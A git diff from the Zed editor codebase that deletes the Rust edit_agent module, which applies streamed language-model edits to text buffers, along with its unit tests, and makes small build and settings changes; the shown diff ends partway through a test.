delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/react_test.py delete mode 100644 crates/agent/src/tests/edit_file_thread_test.rs rename crates/agent/src/{edit_agent => tools/edit_file_tool}/reindent.rs (100%) rename crates/agent/src/{edit_agent => tools/edit_file_tool}/streaming_fuzzy_matcher.rs (100%) delete mode 100644 crates/agent/src/tools/streaming_edit_file_tool.rs diff --git a/.zed/settings.json b/.zed/settings.json index 2ecbd5623d26bd..521cf786abe135 100644 --- a/.zed/settings.json +++ b/.zed/settings.json @@ -57,7 +57,6 @@ "remove_trailing_whitespace_on_save": true, "ensure_final_newline_on_save": true, "file_scan_exclusions": [ - "crates/agent/src/edit_agent/evals/fixtures", "crates/agent/src/tools/evals/fixtures", "**/.git", "**/.svn", diff --git a/Cargo.lock b/Cargo.lock index ecd69e00070657..406d9f450bd6d8 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -163,7 +163,6 @@ dependencies = [ "context_server", "ctor", "db", - "derive_more", "editor", "env_logger 0.11.8", "eval_utils", diff --git a/crates/agent/Cargo.toml b/crates/agent/Cargo.toml index ce472fd9e36ee9..13172212064e3f 100644 --- a/crates/agent/Cargo.toml +++ b/crates/agent/Cargo.toml @@ -31,7 +31,6 @@ cloud_llm_client.workspace = true collections.workspace = true context_server.workspace = true db.workspace = true -derive_more.workspace = true feature_flags.workspace = true fs.workspace = true futures.workspace = true diff --git a/crates/agent/src/agent.rs b/crates/agent/src/agent.rs index 45da8c92169a29..1a7aaffb58053d 100644 --- a/crates/agent/src/agent.rs +++ b/crates/agent/src/agent.rs @@ -1,5 +1,4 @@ mod db; -mod edit_agent; mod legacy_thread; mod native_agent_server; pub mod outline; diff --git a/crates/agent/src/edit_agent.rs b/crates/agent/src/edit_agent.rs deleted file mode 100644 index afaa124de066d9..00000000000000 --- a/crates/agent/src/edit_agent.rs +++ /dev/null @@ -1,1527 +0,0 @@ -mod create_file_parser; -mod edit_parser; -#[cfg(all(test, feature = "unit-eval"))] -mod evals; -pub mod reindent; -pub mod streaming_fuzzy_matcher; - -use crate::{Template, Templates}; -use action_log::ActionLog; -use anyhow::Result; -use create_file_parser::{CreateFileParser, CreateFileParserEvent}; -pub use edit_parser::EditFormat; -use edit_parser::{EditParser, EditParserEvent, EditParserMetrics}; -use futures::{ - Stream, StreamExt, - channel::mpsc::{self, UnboundedReceiver}, - pin_mut, - stream::BoxStream, -}; -use gpui::{AppContext, AsyncApp, Entity, Task}; -use language::{Anchor, Buffer, BufferSnapshot, LineIndent, Point, TextBufferSnapshot}; -use language_model::{ - CompletionIntent, LanguageModel, LanguageModelCompletionError, LanguageModelRequest, - LanguageModelRequestMessage, LanguageModelToolChoice, MessageContent, Role, -}; -use project::{AgentLocation, Project}; -use reindent::{IndentDelta, Reindenter}; -use schemars::JsonSchema; -use serde::{Deserialize, Serialize}; -use std::{mem, ops::Range, pin::Pin, sync::Arc, task::Poll}; -use streaming_diff::{CharOperation, StreamingDiff}; -use streaming_fuzzy_matcher::StreamingFuzzyMatcher; - -#[derive(Serialize)] -struct CreateFilePromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for CreateFilePromptTemplate { - const TEMPLATE_NAME: &'static str = "create_file_prompt.hbs"; -} - -#[derive(Serialize)] -struct EditFileXmlPromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for EditFileXmlPromptTemplate { - const TEMPLATE_NAME: &'static str = "edit_file_prompt_xml.hbs"; -} - -#[derive(Serialize)] -struct EditFileDiffFencedPromptTemplate { - path: Option, - edit_description: String, -} - -impl Template for EditFileDiffFencedPromptTemplate { - const TEMPLATE_NAME: &'static str = "edit_file_prompt_diff_fenced.hbs"; -} - -#[derive(Clone, Debug, PartialEq, Eq)] -pub enum EditAgentOutputEvent { - ResolvingEditRange(Range), - UnresolvedEditRange, - AmbiguousEditRange(Vec>), - Edited(Range), -} - -#[derive(Clone, Debug, Serialize, Deserialize, JsonSchema)] -pub struct EditAgentOutput { - pub raw_edits: String, - pub parser_metrics: EditParserMetrics, -} - -#[derive(Clone)] -pub struct EditAgent { - model: Arc, - action_log: Entity, - project: Entity, - templates: Arc, - edit_format: EditFormat, - thinking_allowed: bool, - update_agent_location: bool, -} - -impl EditAgent { - pub fn new( - model: Arc, - project: Entity, - action_log: Entity, - templates: Arc, - edit_format: EditFormat, - allow_thinking: bool, - update_agent_location: bool, - ) -> Self { - EditAgent { - model, - project, - action_log, - templates, - edit_format, - thinking_allowed: allow_thinking, - update_agent_location, - } - } - - pub fn overwrite( - &self, - buffer: Entity, - edit_description: String, - conversation: &LanguageModelRequest, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let this = self.clone(); - let (events_tx, events_rx) = mpsc::unbounded(); - let conversation = conversation.clone(); - let output = cx.spawn(async move |cx| { - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - let path = cx.update(|cx| snapshot.resolve_file_path(true, cx)); - let prompt = CreateFilePromptTemplate { - path, - edit_description, - } - .render(&this.templates)?; - let new_chunks = this - .request(conversation, CompletionIntent::CreateFile, prompt, cx) - .await?; - - let (output, mut inner_events) = this.overwrite_with_chunks(buffer, new_chunks, cx); - while let Some(event) = inner_events.next().await { - events_tx.unbounded_send(event).ok(); - } - output.await - }); - (output, events_rx) - } - - fn overwrite_with_chunks( - &self, - buffer: Entity, - edit_chunks: impl 'static + Send + Stream>, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let (output_events_tx, output_events_rx) = mpsc::unbounded(); - let (parse_task, parse_rx) = Self::parse_create_file_chunks(edit_chunks, cx); - let this = self.clone(); - let task = cx.spawn(async move |cx| { - this.action_log - .update(cx, |log, cx| log.buffer_created(buffer.clone(), cx)); - this.overwrite_with_chunks_internal(buffer, parse_rx, output_events_tx, cx) - .await?; - parse_task.await - }); - (task, output_events_rx) - } - - async fn overwrite_with_chunks_internal( - &self, - buffer: Entity, - mut parse_rx: UnboundedReceiver>, - output_events_tx: mpsc::UnboundedSender, - cx: &mut AsyncApp, - ) -> Result<()> { - let buffer_id = cx.update(|cx| { - let buffer_id = buffer.read(cx).remote_id(); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::min_for_buffer(buffer_id), - }), - cx, - ) - }); - } - buffer_id - }); - - let send_edit_event = || { - output_events_tx - .unbounded_send(EditAgentOutputEvent::Edited( - Anchor::min_max_range_for_buffer(buffer_id), - )) - .ok() - }; - let set_agent_location = |cx: &mut _| { - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer(buffer_id), - }), - cx, - ) - }) - } - }; - let mut first_chunk = true; - while let Some(event) = parse_rx.next().await { - match event? { - CreateFileParserEvent::NewTextChunk { chunk } => { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - if mem::take(&mut first_chunk) { - buffer.set_text(chunk, cx) - } else { - buffer.append(chunk, cx) - } - }); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - set_agent_location(cx); - }); - send_edit_event(); - } - } - } - - if first_chunk { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| buffer.set_text("", cx)); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - set_agent_location(cx); - }); - send_edit_event(); - } - - Ok(()) - } - - pub fn edit( - &self, - buffer: Entity, - edit_description: String, - conversation: &LanguageModelRequest, - cx: &mut AsyncApp, - ) -> ( - Task>, - mpsc::UnboundedReceiver, - ) { - let this = self.clone(); - let (events_tx, events_rx) = mpsc::unbounded(); - let conversation = conversation.clone(); - let edit_format = self.edit_format; - let output = cx.spawn(async move |cx| { - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - let path = cx.update(|cx| snapshot.resolve_file_path(true, cx)); - let prompt = match edit_format { - EditFormat::XmlTags => EditFileXmlPromptTemplate { - path, - edit_description, - } - .render(&this.templates)?, - EditFormat::DiffFenced => EditFileDiffFencedPromptTemplate { - path, - edit_description, - } - .render(&this.templates)?, - }; - - let edit_chunks = this - .request(conversation, CompletionIntent::EditFile, prompt, cx) - .await?; - this.apply_edit_chunks(buffer, edit_chunks, events_tx, cx) - .await - }); - (output, events_rx) - } - - async fn apply_edit_chunks( - &self, - buffer: Entity, - edit_chunks: impl 'static + Send + Stream>, - output_events: mpsc::UnboundedSender, - cx: &mut AsyncApp, - ) -> Result { - self.action_log - .update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - - let (output, edit_events) = Self::parse_edit_chunks(edit_chunks, self.edit_format, cx); - let mut edit_events = edit_events.peekable(); - while let Some(edit_event) = Pin::new(&mut edit_events).peek().await { - // Skip events until we're at the start of a new edit. - let Ok(EditParserEvent::OldTextChunk { .. }) = edit_event else { - edit_events.next().await.unwrap()?; - continue; - }; - - let snapshot = buffer.read_with(cx, |buffer, _| buffer.snapshot()); - - // Resolve the old text in the background, updating the agent - // location as we keep refining which range it corresponds to. - let (resolve_old_text, mut old_range) = - Self::resolve_old_text(snapshot.text.clone(), edit_events, cx); - while let Ok(old_range) = old_range.recv().await { - if let Some(old_range) = old_range { - let old_range = snapshot.anchor_before(old_range.start) - ..snapshot.anchor_before(old_range.end); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: old_range.end, - }), - cx, - ); - }); - } - output_events - .unbounded_send(EditAgentOutputEvent::ResolvingEditRange(old_range)) - .ok(); - } - } - - let (edit_events_, mut resolved_old_text) = resolve_old_text.await?; - edit_events = edit_events_; - - // If we can't resolve the old text, restart the loop waiting for a - // new edit (or for the stream to end). - let resolved_old_text = match resolved_old_text.len() { - 1 => resolved_old_text.pop().unwrap(), - 0 => { - output_events - .unbounded_send(EditAgentOutputEvent::UnresolvedEditRange) - .ok(); - continue; - } - _ => { - let ranges = resolved_old_text - .into_iter() - .map(|text| { - let start_line = - (snapshot.offset_to_point(text.range.start).row + 1) as usize; - let end_line = - (snapshot.offset_to_point(text.range.end).row + 1) as usize; - start_line..end_line - }) - .collect(); - output_events - .unbounded_send(EditAgentOutputEvent::AmbiguousEditRange(ranges)) - .ok(); - continue; - } - }; - - // Compute edits in the background and apply them as they become - // available. - let (compute_edits, edits) = - Self::compute_edits(snapshot, resolved_old_text, edit_events, cx); - let mut edits = edits.ready_chunks(32); - while let Some(edits) = edits.next().await { - if edits.is_empty() { - continue; - } - - // Edit the buffer and report edits to the action log as part of the - // same effect cycle, otherwise the edit will be reported as if the - // user made it. - let (min_edit_start, max_edit_end) = cx.update(|cx| { - let (min_edit_start, max_edit_end) = buffer.update(cx, |buffer, cx| { - buffer.edit(edits.iter().cloned(), None, cx); - let max_edit_end = buffer - .summaries_for_anchors::( - edits.iter().map(|(range, _)| range.end), - ) - .max() - .unwrap(); - let min_edit_start = buffer - .summaries_for_anchors::( - edits.iter().map(|(range, _)| range.start), - ) - .min() - .unwrap(); - ( - buffer.anchor_after(min_edit_start), - buffer.anchor_before(max_edit_end), - ) - }); - self.action_log - .update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); - if self.update_agent_location { - self.project.update(cx, |project, cx| { - project.set_agent_location( - Some(AgentLocation { - buffer: buffer.downgrade(), - position: max_edit_end, - }), - cx, - ); - }); - } - (min_edit_start, max_edit_end) - }); - output_events - .unbounded_send(EditAgentOutputEvent::Edited(min_edit_start..max_edit_end)) - .ok(); - } - - edit_events = compute_edits.await?; - } - - output.await - } - - fn parse_edit_chunks( - chunks: impl 'static + Send + Stream>, - edit_format: EditFormat, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver>, - ) { - let (tx, rx) = mpsc::unbounded(); - let output = cx.background_spawn(async move { - pin_mut!(chunks); - - let mut parser = EditParser::new(edit_format); - let mut raw_edits = String::new(); - while let Some(chunk) = chunks.next().await { - match chunk { - Ok(chunk) => { - raw_edits.push_str(&chunk); - for event in parser.push(&chunk) { - tx.unbounded_send(Ok(event))?; - } - } - Err(error) => { - tx.unbounded_send(Err(error.into()))?; - } - } - } - Ok(EditAgentOutput { - raw_edits, - parser_metrics: parser.finish(), - }) - }); - (output, rx) - } - - fn parse_create_file_chunks( - chunks: impl 'static + Send + Stream>, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver>, - ) { - let (tx, rx) = mpsc::unbounded(); - let output = cx.background_spawn(async move { - pin_mut!(chunks); - - let mut parser = CreateFileParser::new(); - let mut raw_edits = String::new(); - while let Some(chunk) = chunks.next().await { - match chunk { - Ok(chunk) => { - raw_edits.push_str(&chunk); - for event in parser.push(Some(&chunk)) { - tx.unbounded_send(Ok(event))?; - } - } - Err(error) => { - tx.unbounded_send(Err(error.into()))?; - } - } - } - // Send final events with None to indicate completion - for event in parser.push(None) { - tx.unbounded_send(Ok(event))?; - } - Ok(EditAgentOutput { - raw_edits, - parser_metrics: EditParserMetrics::default(), - }) - }); - (output, rx) - } - - fn resolve_old_text( - snapshot: TextBufferSnapshot, - mut edit_events: T, - cx: &mut AsyncApp, - ) -> ( - Task)>>, - watch::Receiver>>, - ) - where - T: 'static + Send + Unpin + Stream>, - { - let (mut old_range_tx, old_range_rx) = watch::channel(None); - let task = cx.background_spawn(async move { - let mut matcher = StreamingFuzzyMatcher::new(snapshot); - while let Some(edit_event) = edit_events.next().await { - let EditParserEvent::OldTextChunk { - chunk, - done, - line_hint, - } = edit_event? - else { - break; - }; - - old_range_tx.send(matcher.push(&chunk, line_hint))?; - if done { - break; - } - } - - let matches = matcher.finish(); - let best_match = matcher.select_best_match(); - - old_range_tx.send(best_match.clone())?; - - let indent = LineIndent::from_iter( - matcher - .query_lines() - .first() - .unwrap_or(&String::new()) - .chars(), - ); - - let resolved_old_texts = if let Some(best_match) = best_match { - vec![ResolvedOldText { - range: best_match, - indent, - }] - } else { - matches - .into_iter() - .map(|range| ResolvedOldText { range, indent }) - .collect::>() - }; - - Ok((edit_events, resolved_old_texts)) - }); - - (task, old_range_rx) - } - - fn compute_edits( - snapshot: BufferSnapshot, - resolved_old_text: ResolvedOldText, - mut edit_events: T, - cx: &mut AsyncApp, - ) -> ( - Task>, - UnboundedReceiver<(Range, Arc)>, - ) - where - T: 'static + Send + Unpin + Stream>, - { - let (edits_tx, edits_rx) = mpsc::unbounded(); - let compute_edits = cx.background_spawn(async move { - let buffer_start_indent = snapshot - .line_indent_for_row(snapshot.offset_to_point(resolved_old_text.range.start).row); - let indent_delta = - reindent::compute_indent_delta(buffer_start_indent, resolved_old_text.indent); - - let old_text = snapshot - .text_for_range(resolved_old_text.range.clone()) - .collect::(); - let mut diff = StreamingDiff::new(old_text); - let mut edit_start = resolved_old_text.range.start; - let mut new_text_chunks = - Self::reindent_new_text_chunks(indent_delta, &mut edit_events); - let mut done = false; - while !done { - let char_operations = if let Some(new_text_chunk) = new_text_chunks.next().await { - diff.push_new(&new_text_chunk?) - } else { - done = true; - mem::take(&mut diff).finish() - }; - - for op in char_operations { - match op { - CharOperation::Insert { text } => { - let edit_start = snapshot.anchor_after(edit_start); - edits_tx.unbounded_send((edit_start..edit_start, Arc::from(text)))?; - } - CharOperation::Delete { bytes } => { - let edit_end = edit_start + bytes; - let edit_range = - snapshot.anchor_after(edit_start)..snapshot.anchor_before(edit_end); - edit_start = edit_end; - edits_tx.unbounded_send((edit_range, Arc::from("")))?; - } - CharOperation::Keep { bytes } => edit_start += bytes, - } - } - } - - drop(new_text_chunks); - anyhow::Ok(edit_events) - }); - - (compute_edits, edits_rx) - } - - fn reindent_new_text_chunks( - delta: IndentDelta, - mut stream: impl Unpin + Stream>, - ) -> impl Stream> { - let mut reindenter = Reindenter::new(delta); - let mut done = false; - futures::stream::poll_fn(move |cx| { - while !done { - let (chunk, is_last_chunk) = match stream.poll_next_unpin(cx) { - Poll::Ready(Some(Ok(EditParserEvent::NewTextChunk { chunk, done }))) => { - (chunk, done) - } - Poll::Ready(Some(Err(err))) => return Poll::Ready(Some(Err(err))), - Poll::Pending => return Poll::Pending, - _ => return Poll::Ready(None), - }; - - let mut indented_new_text = reindenter.push(&chunk); - // This was the last chunk, push all the buffered content as-is. - if is_last_chunk { - indented_new_text.push_str(&reindenter.finish()); - done = true; - } - - if !indented_new_text.is_empty() { - return Poll::Ready(Some(Ok(indented_new_text))); - } - } - - Poll::Ready(None) - }) - } - - async fn request( - &self, - mut conversation: LanguageModelRequest, - intent: CompletionIntent, - prompt: String, - cx: &mut AsyncApp, - ) -> Result>> { - let mut messages_iter = conversation.messages.iter_mut(); - if let Some(last_message) = messages_iter.next_back() - && last_message.role == Role::Assistant - { - let old_content_len = last_message.content.len(); - last_message - .content - .retain(|content| !matches!(content, MessageContent::ToolUse(_))); - let new_content_len = last_message.content.len(); - - // We just removed pending tool uses from the content of the - // last message, so it doesn't make sense to cache it anymore - // (e.g., the message will look very different on the next - // request). Thus, we move the flag to the message prior to it, - // as it will still be a valid prefix of the conversation. - if old_content_len != new_content_len - && last_message.cache - && let Some(prev_message) = messages_iter.next_back() - { - last_message.cache = false; - prev_message.cache = true; - } - - if last_message.content.is_empty() { - conversation.messages.pop(); - } - } - - conversation.messages.push(LanguageModelRequestMessage { - role: Role::User, - content: vec![MessageContent::Text(prompt)], - cache: false, - reasoning_details: None, - }); - - // Include tools in the request so that we can take advantage of - // caching when ToolChoice::None is supported. - let mut tool_choice = None; - let mut tools = Vec::new(); - if !conversation.tools.is_empty() - && self - .model - .supports_tool_choice(LanguageModelToolChoice::None) - { - tool_choice = Some(LanguageModelToolChoice::None); - tools = conversation.tools.clone(); - } - - let request = LanguageModelRequest { - thread_id: conversation.thread_id, - prompt_id: conversation.prompt_id, - intent: Some(intent), - messages: conversation.messages, - tool_choice, - tools, - stop: Vec::new(), - temperature: None, - thinking_allowed: self.thinking_allowed, - thinking_effort: None, - speed: None, - }; - - Ok(self.model.stream_completion_text(request, cx).await?.stream) - } -} - -struct ResolvedOldText { - range: Range, - indent: LineIndent, -} - -#[cfg(test)] -mod tests { - use super::*; - use fs::FakeFs; - use futures::stream; - use gpui::{AppContext, TestAppContext}; - use indoc::indoc; - use language_model::fake_provider::FakeLanguageModel; - use pretty_assertions::assert_matches; - use project::{AgentLocation, Project}; - use rand::prelude::*; - use rand::rngs::StdRng; - use std::cmp; - - #[gpui::test(iterations = 100)] - async fn test_empty_old_text(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| { - Buffer::local( - indoc! {" - abc - def - ghi - "}, - cx, - ) - }); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - jkl - def - DEF - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - pretty_assertions::assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - indoc! {" - abc - DEF - ghi - "} - ); - } - - #[gpui::test(iterations = 100)] - async fn test_indentation(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| { - Buffer::local( - indoc! {" - lorem - ipsum - dolor - sit - "}, - cx, - ) - }); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - ipsum - dolor - sit - - - ipsum - dolor - sit - amet - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - pretty_assertions::assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - indoc! {" - lorem - ipsum - dolor - sit - amet - "} - ); - } - - #[gpui::test(iterations = 100)] - async fn test_dependent_edits(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - def - - - DEF - - - - DEF - - - DeF - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\nDeF\nghi" - ); - } - - #[gpui::test(iterations = 100)] - async fn test_old_text_hallucination(cx: &mut TestAppContext, mut rng: StdRng) { - let agent = init_test(cx).await; - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (apply, _events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut cx.to_async(), - ); - cx.run_until_parked(); - - simulate_llm_output( - &agent, - indoc! {" - - jkl - - - mno - - - - abc - - - ABC - - "}, - &mut rng, - cx, - ); - apply.await.unwrap(); - - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "ABC\ndef\nghi" - ); - } - - #[gpui::test] - async fn test_edit_events(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let model = agent.model.as_fake(); - let project = agent - .action_log - .read_with(cx, |log, _| log.project().clone()); - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi\njkl", cx)); - - let mut async_cx = cx.to_async(); - let (apply, mut events) = agent.edit( - buffer.clone(), - String::new(), - &LanguageModelRequest::default(), - &mut async_cx, - ); - cx.run_until_parked(); - - model.send_last_completion_stream_text_chunk("a"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - None - ); - - model.send_last_completion_stream_text_chunk("bc"); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(0, 0)) - ..buffer.anchor_before(Point::new(0, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("abX"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited(_)] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXc\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("cY"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk(""); - model.send_last_completion_stream_text_chunk("hall"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("ucinated old"); - model.send_last_completion_stream_text_chunk(""); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::UnresolvedEditRange] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("hallucinated new"); - cx.run_until_parked(); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(0, 5))) - }) - ); - - model.send_last_completion_stream_text_chunk("\nghi\nj"); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(2, 0)) - ..buffer.anchor_before(Point::new(2, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("kl"); - model.send_last_completion_stream_text_chunk(""); - cx.run_until_parked(); - assert_eq!( - drain_events(&mut events), - vec![EditAgentOutputEvent::ResolvingEditRange(buffer.read_with( - cx, - |buffer, _| buffer.anchor_before(Point::new(2, 0)) - ..buffer.anchor_before(Point::new(3, 3)) - ))] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nghi\njkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(3, 3))) - }) - ); - - model.send_last_completion_stream_text_chunk("GHI"); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nGHI" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - - model.end_last_completion_stream(); - apply.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abXcY\ndef\nGHI" - ); - assert_eq!(drain_events(&mut events), vec![]); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: buffer.read_with(cx, |buffer, _| buffer.anchor_before(Point::new(2, 3))) - }) - ); - } - - #[gpui::test] - async fn test_overwrite_events(cx: &mut TestAppContext) { - let agent = init_test(cx).await; - let project = agent - .action_log - .read_with(cx, |log, _| log.project().clone()); - let buffer = cx.new(|cx| Buffer::local("abc\ndef\nghi", cx)); - let (chunks_tx, chunks_rx) = mpsc::unbounded(); - let (apply, mut events) = agent.overwrite_with_chunks( - buffer.clone(), - chunks_rx.map(|chunk: &str| Ok(chunk.to_string())), - &mut cx.to_async(), - ); - - cx.run_until_parked(); - assert_eq!(drain_events(&mut events).as_slice(), []); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "abc\ndef\nghi" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::min_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("```\njkl\n").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("mno\n").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited { .. }] - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - chunks_tx.unbounded_send("pqr\n```").unwrap(); - cx.run_until_parked(); - assert_matches!( - drain_events(&mut events).as_slice(), - [EditAgentOutputEvent::Edited(_)], - ); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno\npqr" - ); - assert_eq!( - project.read_with(cx, |project, _| project.agent_location()), - Some(AgentLocation { - buffer: buffer.downgrade(), - position: language::Anchor::max_for_buffer( - cx.update(|cx| buffer.read(cx).remote_id()) - ), - }) - ); - - drop(chunks_tx); - apply.await.unwrap(); - assert_eq!( - buffer.read_with(cx, |buffer, _| buffer.snapshot().text()), - "jkl\nmno\npqr" - ); - assert_eq!(drain_events(&mut events), vec![]); - 